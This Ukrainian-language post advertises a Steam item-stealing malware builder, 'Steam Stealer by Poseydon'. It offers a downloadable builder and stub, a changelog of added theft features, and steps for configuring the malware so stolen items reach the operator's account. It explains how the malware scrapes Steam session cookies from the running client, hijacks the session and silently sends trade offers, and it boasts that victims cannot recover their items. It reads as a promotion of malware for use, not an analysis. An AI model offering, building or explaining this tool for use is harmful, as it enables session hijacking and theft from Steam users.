Вірусологія

Steam Stealer by Poseydon

12.08.2018

282

Steam Stealer – Це програма, яка краде (стиллит) речі з Steam-аккауни. Метод: відправка офф.трейда на Ваш Steam-аккаунт (не помітно для користувача)

builderposeydon.zip
– PoseydonBuilder.exe – Builder for stealer
– stub.exe – special sub for building (Maybe have signatures of Antivirus, dont worry)

Оновлення

v.6.3
– Оновлення для нового клієнта Steam
– Виправлена проблема на Windows 8
v6
– Оновлений клієнт
– Додана поддежка x64 систем
v5
– Додана крадіжка предметів з Dota і самого Steam
v4
– Покращено алгоритм передачі предметів
– Оновлення клієнта під новий Steam

Робимо вірус
1. Відкрити білдер
2. http://steamidfinder.com/ – тут визначити свій ID
3. http://steamcommunity.com/id/me/tradeoffers/privacy
Тут отримуємо partner ID, ID token

Підтримувані гри:
DOTA 2, CS:GO (Counter Strike: Global Offensive), TF2, Steam

Загальна схема роботи:

З процесу «Стима» регуляркой выдираются дві cookie-запису SteamLogin і SteamLoginSecure.
Далі отримані дані підставляються у веб-запит, який надсилається на сервер і виходить сесія, ну і авторизація. Після цього у програми теоретично є повний доступ до всіх функцій клієнта Steam. Отримання списку итемов і відправка трейд-оффера була описана в попередній статті (код наведений в тій статті для відправки оффера — не робочий).

Які результати?
Жертва намагається відновити предмети, але їй відмовляють. (Скріншот листування: http://s2.micp.ru/e01JB.jpg)

Нижче представлю докази працездатності програми: